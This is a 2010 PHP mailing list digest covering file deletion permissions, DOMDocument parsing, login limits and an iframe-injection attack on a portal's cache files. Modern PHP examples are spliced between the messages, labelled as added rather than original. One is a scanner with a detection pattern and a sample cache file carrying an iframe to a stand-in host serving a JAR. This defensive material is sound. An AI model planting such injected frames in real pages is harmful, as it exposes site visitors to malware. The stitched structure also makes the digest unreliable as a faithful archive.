php-general Digest 7 Jun 2010 09:45:48 -0000 Issue 6785

2010-06-07 Thread php-general-digest-help

Topics (messages 305858 through 305873):

Re: unlink()?
305858 by: Ashley Sheridan
305860 by: tedd

DOMDocument throws Unexpected end tag error when loading valid HTML
305859 by: Raymond Irving
305873 by: Richard Quadling

image thumbnail from blob data
305861 by: saeed ahmed
305862 by: Ashley Sheridan
305863 by: Karl DeSaulniers
305864 by: Paul M Foster
305865 by: Phpster
305871 by: Adam Richardson

Limiting logins
305866 by: Skip Evans
305867 by: Ashley Sheridan
305868 by: Paul M Foster
305870 by: Skip Evans

DOMDocument::loadXML() failed when parsing comments inside a script tag
305869 by: Raymond Irving
305872 by: Adam Richardson

--
---BeginMessage---
On Sun, 2010-06-06 at 14:08 -0400, tedd wrote:

 At 1:02 AM +0100 6/6/10, Ashley Sheridan wrote:
 On Sat, 2010-06-05 at 18:55 -0400, tedd wrote:
 
 Hi gang:
 
 Never-mind.
 
 I didn't change the parent directory permissions to unlink the file -- duh!
 
 tedd
 
 I was just about to mention this! It's one of the bizarre security 
 loopholes in Linux. If you have write permissions to a directory but 
 not a file within it, you can still delete the file. I believe you 
 can change this behaviour with filesystem security mods, but I've 
 not tried that.
 
 Ash
 
 Yes, I've seen where you can delete files within a directory by 
 changing the directory permissions.
 
 It's not often that my scripts create/delete files on the server -- 
 so I'm not up on it as much as I probably should be.
 
 However to me, it seems overly cautious to require scripts -- that 
 are already running on the server -- to have the authority (ftp id 
 and password) to create/delete files. After all, the scripts would 
 not be there if the person who placed them there didn't have 
 authority to create and delete files. So, I have to wonder under what 
 scenario would evil scripts be found/run on the server?
 
 For example, if anyone was going to create an evil script and place 
 it on the server, they must have the authority to do that. And if 
 they had that authority, then they could just as easily add that to 
 their script and side-step this requirement, right? So, what's the 
 purpose?
 
 Cheers,
 
 tedd
 
 -- 
 ---
 http://sperling.com  http://ancientstones.com  http://earthstones.com
 


I think it's more likely that a security flaw might be found which
allows code other than yours to run. Buffer overflows were notorious for
this, as they had the side-effect of running whatever ran outside of
their buffer range, so you could in effect get a system with an overflow
hole to run whatever code you wanted. Usually a problem like this would
be limited to a specific function, but if someone was able to guess
correctly that you were using this function then they could potentially
form code that exploited it.

I'm not an expert on this sort of thing, so what I've just said is how I
roughly understand one aspect of the problem.

Thanks,
Ash
http://www.ashleysheridan.co.uk
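
The behaviour discussed in this thread follows from unlink() needing write and search permission on the parent directory rather than on the file; the sticky (restricted deletion) bit on a directory narrows deletion to the file's owner, the directory's owner and root. The PHP check below is an added example, not code from the thread: the function name and the temporary directory tree are assumptions made for the demonstration. It lists directories in which a non-owner could delete files.

```php
<?php
// Added example, not code from the thread. Directory names are constructed.

/**
 * List directories under $root where group or other have write+search
 * permission and the sticky bit is missing: anyone in that class can
 * unlink() or rename() entries there, whatever the files' own modes are.
 */
function findDeletableByNonOwner(string $root): array
{
    $dirs = [$root];
    $walker = new RecursiveIteratorIterator(
        new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS),
        RecursiveIteratorIterator::SELF_FIRST
    );
    foreach ($walker as $entry) {
        if ($entry->isDir() && !$entry->isLink()) {
            $dirs[] = $entry->getPathname();
        }
    }

    $findings = [];
    foreach ($dirs as $dir) {
        $mode   = fileperms($dir) & 07777;
        $sticky = ($mode & 01000) !== 0;
        $group  = ($mode & 0030) === 0030;   // g+wx
        $other  = ($mode & 0003) === 0003;   // o+wx
        if (!$sticky && ($group || $other)) {
            $who = array_keys(array_filter(['group' => $group, 'other' => $other]));
            $findings[] = [
                'dir'  => $dir,
                'mode' => sprintf('%04o', $mode),
                'who'  => implode('+', $who),
            ];
        }
    }
    return $findings;
}

// Constructed tree: a world-writable cache, a sticky upload area, a private dir.
$root = sys_get_temp_dir() . '/unlink-demo-' . bin2hex(random_bytes(4));
mkdir($root, 0755);
foreach (['cache' => 0777, 'uploads' => 01777, 'private' => 0755] as $name => $mode) {
    mkdir("$root/$name");
    chmod("$root/$name", $mode);             // chmod() ignores the umask
}
file_put_contents("$root/cache/page.html", 'cached page');
chmod("$root/cache/page.html", 0444);        // nobody may write the file itself

foreach (findDeletableByNonOwner($root) as $f) {
    printf("%s mode %s: deletable by %s\n", $f['dir'], $f['mode'], $f['who']);
}

// The file's read-only mode does not protect it: the directory decides.
$removed = unlink("$root/cache/page.html");
printf("unlink() on the 0444 file: %s\n", $removed ? 'succeeded' : 'failed');

// Clean up the constructed tree.
foreach (['cache', 'uploads', 'private'] as $name) {
    rmdir("$root/$name");
}
rmdir($root);
```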


---End Message---
---BeginMessage---




I think it's more likely that a security flaw might be found which 
allows code other than yours to run. Buffer overflows were notorious 
for this, as they had the side-effect of running whatever ran 
outside of their buffer range, so you could in effect get a system 
with an overflow hole to run whatever code you wanted. Usually a 
problem like this would be limited to a specific function, but if 
someone was able to guess correctly that you were using this 
function then they could potentially form code that exploited it.


I'm not an expert on this sort of thing, so what I've just said is 
how I roughly understand one aspect of the problem.


Thanks,
Ash


Ash:

Good enough.

Thanks,

tedd

--
---
http://sperling.com  http://ancientstones.com  http://earthstones.com
---End Message---
---BeginMessage---
Hello,

Sorry to have to be writing to you directly. I've tried sending this email
to the mailing list but it keeps returning with a failure message:

Remote host said: 550 5.7.1 reject mailfrom [sbl]

It appears that my Yahoo account has been blacklisted?

Anyway, I'm hoping you can help me with the following issue:

I'm getting a php warning from DOMDocument after running a test script that
tried to load some html inside the DOM and then echo the html to the
browser:

Warning: DOMDocument::loadHTML() [domdocument.loadhtml]: Unexpected end tag
: strong in Entity, line: 8 in C:\www\dom-test.php on line 23

The problem is that DOMDocument::loadHTML() attempts to 

Re: [PHP] DOMDocument throws Unexpected end tag error when loading valid HTML

2010-06-07 Thread Richard Quadling
On 6 June 2010 19:56, Raymond Irving xwis...@gmail.com wrote:
 Hello,

 Sorry to have to be writing to you directly. I've tried sending this email
 to the mailing list but it keeps returning with a failure message:

 Remote host said: 550 5.7.1 reject mailfrom [sbl]

 It appears that my Yahoo account has been blacklisted?

 Anyway, I'm hoping you can help me with the following issue:

 I'm getting a php warning from DOMDocument after running a test script that
 tried to load some html inside the DOM and then echo the html to the
 browser:

 Warning: DOMDocument::loadHTML() [domdocument.loadhtml]: Unexpected end tag
 : strong in Entity, line: 8 in C:\www\dom-test.php on line 23

 The problem is that DOMDocument::loadHTML() attempts to remove the
 '</strong>'  tag from within a JavaScript string variable inside the
 script tag. If I try to wrap <!-- --> around the content of the script
 tag it will still throw the error.


 I've tested it with php *5.2.0, 5.2.6, 5.2.11*, *5.3* and *5.3.2*. It
 appears to work just fine in version 5.2.0 but the other version throw the
 above error.

 Here's the script. Can anyone confirm this error or is there a known
 workaround?

 <?php

 $html = '
 <!DOCTYPE html>
 <html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
        <script type="text/javascript">
            var html = "<strong>Bold Text</strong>,Normal Text";
            document.write(html);
            alert(html);
        </script>
    </head>
    <body> </body>
 </html>
 ';

 $dom = new DOMDocument();
 $dom->loadHTML($html);

 echo $dom->saveHTML();

 ?>


 Best regards
 __
 Raymond Irving


Should the HTML be wrapped ...

<![CDATA[
<html><tag><soup>here</soup></tag></html>
]]>

?

-- 
-
Richard Quadling
Standing on the shoulders of some very clever giants!
EE : http://www.experts-exchange.com/M_248814.html
EE4Free : http://www.experts-exchange.com/becomeAnExpert.jsp
Zend Certified Engineer : http://zend.com/zce.php?c=ZEND002498r=213474731
ZOPA : http://uk.zopa.com/member/RQuadling

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php



Re: [PHP] DOMDocument throws Unexpected end tag error when loading valid HTML

2010-06-07 Thread Richard Quadling
On 6 June 2010 19:56, Raymond Irving xwis...@gmail.com wrote:
 Hello,

 Sorry to have to be writing to you directly. I've tried sending this email
 to the mailing list but it keeps returning with a failure message:

 Remote host said: 550 5.7.1 reject mailfrom [sbl]

 It appears that my Yahoo account has been blacklisted?

 Anyway, I'm hoping you can help me with the following issue:

 I'm getting a php warning from DOMDocument after running a test script that
 tried to load some html inside the DOM and then echo the html to the
 browser:

 Warning: DOMDocument::loadHTML() [domdocument.loadhtml]: Unexpected end tag
 : strong in Entity, line: 8 in C:\www\dom-test.php on line 23

 The problem is that DOMDocument::loadHTML() attempts to remove the
 '</strong>'  tag from within a JavaScript string variable inside the
 script tag. If I try to wrap <!-- --> around the content of the script
 tag it will still throw the error.


 I've tested it with php *5.2.0, 5.2.6, 5.2.11*, *5.3* and *5.3.2*. It
 appears to work just fine in version 5.2.0 but the other version throw the
 above error.

 Here's the script. Can anyone confirm this error or is there a known
 workaround?

 <?php

 $html = '
 <!DOCTYPE html>
 <html>
    <head>
        <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
        <script type="text/javascript">
            var html = "<strong>Bold Text</strong>,Normal Text";
            document.write(html);
            alert(html);
        </script>
    </head>
    <body> </body>
 </html>
 ';

 $dom = new DOMDocument();
 $dom->loadHTML($html);

 echo $dom->saveHTML();

 ?>


 Best regards
 __
 Raymond Irving


Or should the html that is inside the JS be urlencoded?

&lt;strong&gt;

?

-- 
-
Richard Quadling
Standing on the shoulders of some very clever giants!
EE : http://www.experts-exchange.com/M_248814.html
EE4Free : http://www.experts-exchange.com/becomeAnExpert.jsp
Zend Certified Engineer : http://zend.com/zce.php?c=ZEND002498r=213474731
ZOPA : http://uk.zopa.com/member/RQuadling




Re: [PHP] Limiting logins

2010-06-07 Thread Richard Quadling
On 7 June 2010 04:20, Skip Evans s...@bigskypenguin.com wrote:
 Hey Ash & all,

 Thanks for that detailed explanation.

 This is a lot of what I was thinking. Cookies can get deleted, etc, and all
 the other things that can toss wrenches into this.

 To clarify, they want to limit a single user to two machines max, but only
 one at a time.

 I'm going to have to explain to them the problems with this and see what
 else they can work out.

 The manual unlock Ash suggests is interesting, and I'll run that by them,
 but I'm thinking they might opt to forgo the limit for now to avoid risking
 pissing off new customers with something that might be more of a hassles for
 them than it's worth.

 Thanks much for your input. This is a lot of good stuff to help me
 articulate a response to the client.

 Skip

 Ashley Sheridan wrote:

 On Sun, 2010-06-06 at 20:31 -0500, Skip Evans wrote:

 Hey all,

 I'm familiar with setting cookies in PHP and using REMOTE_ADDR
 to get a visitor's IP address (or that of their gateway), but
 not quite sure how to implement a robust mechanism that would
 limit a user to logging in from only two different machines, a
 requirement this client has on the project.

 I'd greatly appreciate hearing from people who have done this
 or something similar, or suggestions people might have that
 would give that oh so familiar, D'oh! moment.

 I have some ideas sketched out, setting cookies, etc, but not
 sure how robust they'd be.

 Big Thanks!
 Skip

 --
 
 Skip Evans
 PenguinSites.com, LLC
 503 S Baldwin St, #1
 Madison WI 53703
 608.250.2720
 http://penguinsites.com
 
 Those of you who believe in
 telekinesis, raise my hand.
  -- Kurt Vonnegut



 Is this two machines at the same time, or two machines ever?

 I don't think there's any way you can guarantee either, unless you
 supply them with some form of closed binary that they are forced to use
 either instead of or with the browser, i.e. a Java applet, etc.

 A similar question to this came up on the list not so long ago, and
 there was no real conclusion at the end other than it can't really be
 done. Cookies can be deleted, IP addresses change all the time (either
 deliberately, by some proxy or even by the ISP itself issuing a dynamic
 IP address), even the MAC address (if you found a way to get at it) can
 change.

 About the only thing I've seen that might help was a device made for the
 Bloomberg stock market system, which was a small credit-card sized
 object which would read in a random pattern of flashes from the screen
 and produce a unique ID number which was then keyed back into the
 system. By relying on a physical dongle you can pretty much guarantee
 that a user is only on one system, but the project obviously becomes
 much more costly and complicated.

 If you do go the cookie route, maybe gather a bunch of information to
 store on the server against that cookie and the user. If the cookie is
 not detected the next time the user goes to log in, maybe force them to
 send an email requiring a manual unlock, and make them give a reason for
 either why the cookie was removed, or why the computer information has
 changed beyond the two computer profiles you've got stored for them.
 It's not foolproof, but might show your client why this isn't something
 that can be easily done, and is not something that should be decided on
 lightly, as there are many valid and genuine reasons why somebody might
 want to use more than two computers (i.e. they had a fire and lost those
 computers, they rebuilt a computer with a new OS, they upgraded the
 computer, a computer was stolen and needed to be replaced, they are away
 from their computer and had to use a public access one, etc. The list
 can go on and on.)

 Thanks,
 Ash
 http://www.ashleysheridan.co.uk




 --
 
 Skip Evans
 PenguinSites.com, LLC
 503 S Baldwin St, #1
 Madison WI 53703
 608.250.2720
 http://penguinsites.com
 
 Those of you who believe in
 telekinesis, raise my hand.
  -- Kurt Vonnegut

 --
 PHP General Mailing List (http://www.php.net/)
 To unsubscribe, visit: http://www.php.net/unsub.php



For dealing with multiple simultaneous logins, the easiest option is
to store the session ID against the user account on the DB and
compare this for each of the secured resources. Make sure that any
login page doesn't automatically log in, as you could end up in a mad
race as the 2 sessions compete to log in and are constantly throwing
the other session out.

Richard.


-- 
-
Richard Quadling
Standing on the shoulders of some very clever giants!
EE : http://www.experts-exchange.com/M_248814.html
EE4Free : http://www.experts-exchange.com/becomeAnExpert.jsp
Zend Certified Engineer : http://zend.com/zce.php?c=ZEND002498r=213474731
ZOPA : http://uk.zopa.com/member/RQuadling
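
The approach Richard describes (store the session ID against the account, compare it on every secured resource, and never log in automatically) could look like the following in PHP. This is an added example, not code from the thread: the table, column and function names are assumptions, and an in-memory SQLite database stands in for the application's own. It stores a hash of the session ID rather than the ID itself.

```php
<?php
// Added example, not code from the thread. Table, column and function names
// are assumptions; in-memory SQLite (pdo_sqlite) keeps the demo self-contained.

$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, active_session TEXT)');
$pdo->exec("INSERT INTO users (id, name) VALUES (1, 'demo-user')");

/** Hash the ID so a leaked users table does not hand out live session IDs. */
function sessionFingerprint(string $sessionId): string
{
    return hash('sha256', $sessionId);
}

/** Call once, after the password check on an explicit login form submission. */
function registerLogin(PDO $pdo, int $userId, string $sessionId): void
{
    $stmt = $pdo->prepare('UPDATE users SET active_session = ? WHERE id = ?');
    $stmt->execute([sessionFingerprint($sessionId), $userId]);
}

/** Call on every secured resource. */
function isActiveSession(PDO $pdo, int $userId, string $sessionId): bool
{
    $stmt = $pdo->prepare('SELECT active_session FROM users WHERE id = ?');
    $stmt->execute([$userId]);
    $stored = $stmt->fetchColumn();
    return is_string($stored) && hash_equals($stored, sessionFingerprint($sessionId));
}

/** Logging out frees the slot only if the caller still owns it. */
function logout(PDO $pdo, int $userId, string $sessionId): void
{
    $stmt = $pdo->prepare(
        'UPDATE users SET active_session = NULL WHERE id = ? AND active_session = ?'
    );
    $stmt->execute([$userId, sessionFingerprint($sessionId)]);
}

/**
 * Decision for a secured page. A displaced session is sent to the login form
 * and has to submit credentials again. It is never re-registered
 * automatically, because that is what makes two browsers evict each other
 * in a loop.
 */
function gate(PDO $pdo, int $userId, string $sessionId): string
{
    return isActiveSession($pdo, $userId, $sessionId) ? 'serve page' : 'send to login form';
}

// Constructed walk-through. In a web application the IDs would come from
// session_id() after session_regenerate_id(true) at login.
$laptop  = bin2hex(random_bytes(16));
$desktop = bin2hex(random_bytes(16));

registerLogin($pdo, 1, $laptop);
printf("laptop after its login:      %s\n", gate($pdo, 1, $laptop));

registerLogin($pdo, 1, $desktop);          // second machine logs in
printf("laptop after desktop login:  %s\n", gate($pdo, 1, $laptop));
printf("desktop after its login:     %s\n", gate($pdo, 1, $desktop));

logout($pdo, 1, $laptop);                  // stale session must not evict the desktop
printf("desktop after stale logout:  %s\n", gate($pdo, 1, $desktop));
```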


[PHP] Security Issue

2010-06-07 Thread Igor Escobar
Hi Folks!

The portal for which I work is suffering constant attacks that I feel
are PHP Injection. Somehow the hacker is managing to change the cache files
that our system generates, concatenating the HTML file with another that
has an iframe to a malicious JAR file. Do you have any suggestions to
prevent this action? The hacker has no access to our file system; he is
inputting the code through some security hole. The problem is that the portal
is very big and has lots and lots of partners hosted on our
structure. We are failing to identify the focus of these attacks.

Any ideas?


Regards,
Igor Escobar
Systems Analyst & Interface Designer

+ http://blog.igorescobar.com
+ http://www.igorescobar.com
+ @igorescobar (twitter)


Re: [PHP] Security Issue

2010-06-07 Thread Ashley Sheridan
On Mon, 2010-06-07 at 09:54 -0300, Igor Escobar wrote:

 Hi Folks!
 
 The portal for which I work is suffering constant attacks that I feel that
 is PHP Injection. Somehow the hacker is getting to change the cache files
 that our system generates. Concatenating the HTML file with another that
 have an iframe to a malicious JAR file. Do you have any suggestions to
 prevent this action? The hacker has no access to our file system, he is
 imputing the code through some security hole. The problem is that the portal
 is very big and has lots and lots partners hosted on our estructure
 structure. We are failing to identify the focus of this attacks.
 
 Any ideas?
 
 
 Regards,
 Igor Escobar
 Systems Analyst  Interface Designer
 
 + http://blog.igorescobar.com
 + http://www.igorescobar.com
 + @igorescobar (twitter)


OK, first thing, check all the file access logs, i.e. FTP logs, etc,
just to make sure that it's not a case of a compromised password.
There's a well-known issue with people who use FileZilla on Windows
systems that allows passwords to be easily stolen.

Next, see if you can isolate the IP address(s) that might be making
these changes, and then go back over the HTTP access logs to determine
what URLs they are visiting on the site. This should give you an idea
about where the attack is coming in from.

Make sure that any pre-built systems (i.e. shopping carts, blog or forum
software) are patched and up-to-date. A lot of attacks are targeted at
sites en masse because they are found to have the same flaw which, left
unpatched, is like an open door to your server.

It's also not a bad idea to change the passwords used to access the
server, both for FTP and SSH. You might also need to scan the server
with antivirus software (this is mainly for Windows servers really) to
make sure that a rootkit hasn't been installed.

Thanks,
Ash
http://www.ashleysheridan.co.uk
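
The triage Ash outlines (find what changed, then walk back through the HTTP access logs by IP and URL) can be scripted. The PHP below is an added example, not code from the thread; the cache directory, host allowlist, 120-second window and log lines are constructed assumptions. It flags cache files that embed content from hosts off the allowlist and lists, per client IP, the requests logged shortly before each file was modified.

```php
<?php
// Added example, not code from the thread. The cache directory, host
// allowlist, log lines and 120-second window are constructed assumptions.

/** Cache files embedding frames/applets/objects from hosts not on the allowlist. */
function findInjectedCacheFiles(string $cacheDir, array $allowedHosts): array
{
    $pattern = '~<(?:iframe|applet|object|embed)\b[^>]*?'
             . '\b(?:src|archive|codebase|data)\s*=\s*["\']?([^"\'\s>]+)~i';
    $hits = [];
    foreach (glob($cacheDir . '/*.html') ?: [] as $file) {
        if (!preg_match_all($pattern, file_get_contents($file), $m)) {
            continue;
        }
        foreach ($m[1] as $url) {
            $host = parse_url($url, PHP_URL_HOST);   // null for relative (same-site) URLs
            if (is_string($host) && !in_array(strtolower($host), $allowedHosts, true)) {
                $hits[] = ['file' => $file, 'url' => $url, 'mtime' => filemtime($file)];
            }
        }
    }
    return $hits;
}

/** Parse one "combined" format access log line; null if it does not match. */
function parseAccessLine(string $line): ?array
{
    if (!preg_match('~^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+)[^"]*" (\d{3}) ~', $line, $m)) {
        return null;
    }
    $time = DateTimeImmutable::createFromFormat('d/M/Y:H:i:s O', $m[2]);
    if ($time === false) {
        return null;
    }
    return ['ip' => $m[1], 'time' => $time->getTimestamp(),
            'method' => $m[3], 'url' => $m[4], 'status' => (int) $m[5]];
}

/** Requests logged within $window seconds before $mtime, grouped by client IP. */
function requestsBeforeChange(array $logLines, int $mtime, int $window = 120): array
{
    $byIp = [];
    foreach ($logLines as $line) {
        $r = parseAccessLine($line);
        if ($r !== null && $r['time'] <= $mtime && $r['time'] >= $mtime - $window) {
            $byIp[$r['ip']][] = "{$r['method']} {$r['url']} {$r['status']}";
        }
    }
    return $byIp;
}

// Constructed cache directory: one clean file, one with an appended iframe.
$cacheDir = sys_get_temp_dir() . '/cache-demo-' . bin2hex(random_bytes(4));
mkdir($cacheDir);
file_put_contents("$cacheDir/about.html",
    '<html><body><iframe src="/ads/banner.html"></iframe></body></html>');
file_put_contents("$cacheDir/home.html",
    '<html><body>Home</body></html>'
    . '<iframe src="http://untrusted.example/a.jar" width="1" height="1"></iframe>');
$changed = (new DateTimeImmutable('2010-06-07T09:40:12-03:00'))->getTimestamp();
touch("$cacheDir/home.html", $changed);

// Constructed access log lines (documentation IP ranges).
$log = [
    '192.0.2.10 - - [07/Jun/2010:09:31:02 -0300] "GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.23 - - [07/Jun/2010:09:40:05 -0300] "POST /partners/widget.php HTTP/1.1" 200 312',
    '198.51.100.23 - - [07/Jun/2010:09:40:11 -0300] "GET /cache/home.html HTTP/1.1" 200 9120',
    '192.0.2.10 - - [07/Jun/2010:10:15:00 -0300] "GET /about.php HTTP/1.1" 200 2210',
];

foreach (findInjectedCacheFiles($cacheDir, ['www.portal.example']) as $hit) {
    printf("%s embeds %s (modified %s)\n",
        basename($hit['file']), $hit['url'], gmdate('c', $hit['mtime']));
    foreach (requestsBeforeChange($log, $hit['mtime']) as $ip => $requests) {
        printf("  %s: %s\n", $ip, implode(' | ', $requests));
    }
}

// Clean up the constructed files.
array_map('unlink', glob("$cacheDir/*.html") ?: []);
rmdir($cacheDir);
```

File modification times can be reset by whoever wrote the file, so the correlation is a lead for narrowing down which URLs to review rather than proof.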




[PHP] Re: DOMDocument throws Unexpected end tag error when loading valid HTML

2010-06-07 Thread Nisse Engström
On Sun, 6 Jun 2010 13:56:25 -0500, Raymond Irving wrote:

 Here's the script. Can anyone confirm this error or is there a known
 workaround?
 
 <?php
 
 $html = '
 <!DOCTYPE html>
 <html>
 <head>
 <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
 <script type="text/javascript">
 var html = "<strong>Bold Text</strong>,Normal Text";
 document.write(html);
 alert(html);
 </script>
 </head>
 <body> </body>
 </html>
 ';

In HTML, the </ sequence closes the script element.
You can escape the / character with a backslash:

"<strong>Bold Text<\/strong>,Normal Text"


/Nisse
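
When the string comes from PHP rather than being typed by hand, json_encode() produces the escaped form: it writes "/" as "\/" by default, and JSON_HEX_TAG additionally encodes "<" and ">" so no markup sequence can appear inside the script body. The following is an added example, not code from the thread; the helper names and sample strings are assumptions. It parses each variant with DOMDocument and shows what the parser reports and what ends up as the script's text, including a constructed value containing a closing script tag.

```php
<?php
// Added example, not code from the thread. Helper names and sample values
// are constructed for the demonstration.

/** Encode a PHP string as a JavaScript string literal for an inline <script>. */
function jsStringForInlineScript(string $value): string
{
    // json_encode() escapes "/" as "\/" by default; JSON_HEX_TAG also turns
    // "<" and ">" into \u003C and \u003E, so "</" cannot occur in the output.
    return json_encode(
        $value,
        JSON_HEX_TAG | JSON_HEX_AMP | JSON_HEX_APOS | JSON_HEX_QUOT | JSON_THROW_ON_ERROR
    );
}

/** The page from the report, with the JavaScript literal supplied by the caller. */
function page(string $jsLiteral): string
{
    return '<!DOCTYPE html><html><head>'
        . '<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>'
        . '<script type="text/javascript">var html = ' . $jsLiteral . ';</script>'
        . '</head><body> </body></html>';
}

/** Parse with DOMDocument; return the parser messages and the script text. */
function inspect(string $html): array
{
    $previous = libxml_use_internal_errors(true);   // collect instead of warn
    $dom = new DOMDocument();
    $dom->loadHTML($html);
    $messages = [];
    foreach (libxml_get_errors() as $error) {
        $messages[] = trim($error->message);
    }
    libxml_clear_errors();
    libxml_use_internal_errors($previous);

    $scripts = $dom->getElementsByTagName('script');
    return [
        'messages'    => $messages,
        'script_text' => $scripts->length > 0 ? $scripts->item(0)->textContent : null,
    ];
}

$reported = '<strong>Bold Text</strong>,Normal Text';
$closing  = '</script><b>markup after the script</b>';   // constructed value

$cases = [
    'raw literal from the report'     => '"' . $reported . '"',
    'backslash form from the reply'   => '"<strong>Bold Text<\/strong>,Normal Text"',
    'json_encode of reported string'  => jsStringForInlineScript($reported),
    'raw literal with closing tag'    => '"' . $closing . '"',
    'json_encode of closing-tag case' => jsStringForInlineScript($closing),
];

foreach ($cases as $label => $literal) {
    $result = inspect(page($literal));
    printf("%s\n  literal:     %s\n  script text: %s\n  parser said: %s\n\n",
        $label,
        $literal,
        var_export($result['script_text'], true),
        $result['messages'] ? implode('; ', $result['messages']) : '(nothing)'
    );
}
```

Which messages libxml emits for the raw literal depends on the libxml version PHP was built against; the closing-tag case ends the script element early in any HTML parser, which is why values placed in inline scripts should always be encoded.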




Re: [PHP] Security Issue

2010-06-07 Thread Peter Lind
On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com wrote:
 Hi Folks!

 The portal for which I work is suffering constant attacks that I feel that
 is PHP Injection. Somehow the hacker is getting to change the cache files
 that our system generates. Concatenating the HTML file with another that
 have an iframe to a malicious JAR file. Do you have any suggestions to
 prevent this action? The hacker has no access to our file system, he is
 imputing the code through some security hole. The problem is that the portal
 is very big and has lots and lots partners hosted on our estructure
 structure. We are failing to identify the focus of this attacks.

 Any ideas?


Check all user input + upload: make sure that whatever comes from the
user is validated. Then check all output: make sure that everything
output is escaped properly. Yes, it's an enormous task, but there's no
way around it.

Regards
Peter

-- 
<hype>
WWW: http://plphp.dk / http://plind.dk
LinkedIn: http://www.linkedin.com/in/plind
BeWelcome/Couchsurfing: Fake51
Twitter: http://twitter.com/kafe15
</hype>




Re: [PHP] Security Issue

2010-06-07 Thread Ashley Sheridan
On Mon, 2010-06-07 at 10:38 -0700, Michael Shadle wrote:

 It's not that bad.
 
 Use filter functions and sanity checks for input.
 
 Use htmlspecialchars() basically on output.
 
 That should take care of basically everything.
 
 On Jun 7, 2010, at 6:16 AM, Igor Escobar titiolin...@gmail.com wrote:
 
  This was my fear.
 
  Regards,
  Igor Escobar
  Systems Analyst  Interface Designer
 
  + http://blog.igorescobar.com
  + http://www.igorescobar.com
  + @igorescobar (twitter)
 
 
 
 
 
  On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind peter.e.l...@gmail.com  
  wrote:
 
  On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com wrote:
  Hi Folks!
 
  The portal for which I work is suffering constant attacks that I  
  feel
  that
  is PHP Injection. Somehow the hacker is getting to change the  
  cache files
  that our system generates. Concatenating the HTML file with  
  another that
  have an iframe to a malicious JAR file. Do you have any  
  suggestions to
  prevent this action? The hacker has no access to our file system,  
  he is
  imputing the code through some security hole. The problem is that  
  the
  portal
  is very big and has lots and lots partners hosted on our estructure
  structure. We are failing to identify the focus of this attacks.
 
  Any ideas?
 
 
  Check all user input + upload: make sure that whatever comes from the
  user is validated. Then check all output: make sure that everythin
  output is escaped properly. Yes, it's an enormous task, but there's  
  no
  way around it.
 
  Regards
  Peter
 
  --
  hype
  WWW: http://plphp.dk / http://plind.dk
  LinkedIn: http://www.linkedin.com/in/plind
  BeWelcome/Couchsurfing: Fake51
  Twitter: http://twitter.com/kafe15
  /hype
 
 


htmlspecialchars() is really only good for user input that you are
outputting to the browser. For inserting data into a database, use
mysql_real_escape_string(). I find it's good to think carefully about
what sort of data I expect and sanitise it accordingly. If I want a
numerical value, I use intval($_GET['var']) or floatval(). For things
like small text box elements, regex's work well depending on the data.
For data from select lists of checkboxes, make sure the value given is
within a list of pre-determined values you have. Basically, nothing from
the user should be trusted at all, ever.

As soon as you let go of that trust in the good honesty of people you'll
do fine ;)

Thanks,
Ash
http://www.ashleysheridan.co.uk




Re: [PHP] Security Issue

2010-06-07 Thread Michael Shadle
Oh yeah. I do more than just intval(); I make sure they didn't feed me
anything BUT numeric text first. I do a sanity check before type
forcing :)


I use garbage in garbage out. So I take what is given to me and yes I
escape it before the db of course as well, and then encode on output.


On Jun 7, 2010, at 10:45 AM, Ashley Sheridan  
a...@ashleysheridan.co.uk wrote:



On Mon, 2010-06-07 at 10:38 -0700, Michael Shadle wrote:


It's not that bad.

Use filter functions and sanity checks for input.

Use htmlspecialchars() basically on output.

That should take care of basically everything.

On Jun 7, 2010, at 6:16 AM, Igor Escobar titiolin...@gmail.com  
wrote:


 This was my fear.

 Regards,
 Igor Escobar
 Systems Analyst  Interface Designer

 + http://blog.igorescobar.com
 + http://www.igorescobar.com
 + @igorescobar (twitter)





 On Mon, Jun 7, 2010 at 10:05 AM, Peter Lind  
peter.e.l...@gmail.com

 wrote:

 On 7 June 2010 14:54, Igor Escobar titiolin...@gmail.com wrote:
 Hi Folks!

 The portal for which I work is suffering constant attacks that I
 feel
 that
 is PHP Injection. Somehow the hacker is getting to change the
 cache files
 that our system generates. Concatenating the HTML file with
 another that
 have an iframe to a malicious JAR file. Do you have any
 suggestions to
 prevent this action? The hacker has no access to our file system,
 he is
 imputing the code through some security hole. The problem is that
 the
 portal
 is very big and has lots and lots partners hosted on our  
estructure

 structure. We are failing to identify the focus of this attacks.

 Any ideas?


 Check all user input + upload: make sure that whatever comes  
from the

 user is validated. Then check all output: make sure that everythin
 output is escaped properly. Yes, it's an enormous task, but  
there's

 no
 way around it.

 Regards
 Peter

 --
 hype
 WWW: http://plphp.dk / http://plind.dk
 LinkedIn: http://www.linkedin.com/in/plind
 BeWelcome/Couchsurfing: Fake51
 Twitter: http://twitter.com/kafe15
 /hype




htmlspecialchars() is really only good for user input that you are  
outputting to the browser. For inserting data into a database, use  
mysql_real_escape_string(). I find it's good to think carefully  
about what sort of data I expect and sanitise it accordingly. If I  
want a numerical value, I use intval($_GET['var']) or floatval().  
For things like small text box elements, regex's work well depending  
on the data. For data from select lists of checkboxes, make sure the  
value given is within a list of pre-determined values you have.  
Basically, nothing from the user should be trusted at all, ever.


As soon as you let go of that trust in the good honesty of people  
you'll do fine ;)


Thanks,
Ash
http://www.ashleysheridan.co.uk




Re: [PHP] Security Issue

2010-06-07 Thread Ashley Sheridan
On Mon, 2010-06-07 at 14:42 -0300, Igor Escobar wrote:

 It's not a SQL Injection or XSS problem, Michael.
 
 It's a PHP Injection problem. I know how to fix that but the web site is very
 very huge, has lots and lots of partners and I'm having big difficulty
 identifying the focus of the problem.
 
 Got it?
 
 
 Regards,
 Igor Escobar
 Systems Analyst  Interface Designer
 
 + http://blog.igorescobar.com
 + http://www.igorescobar.com
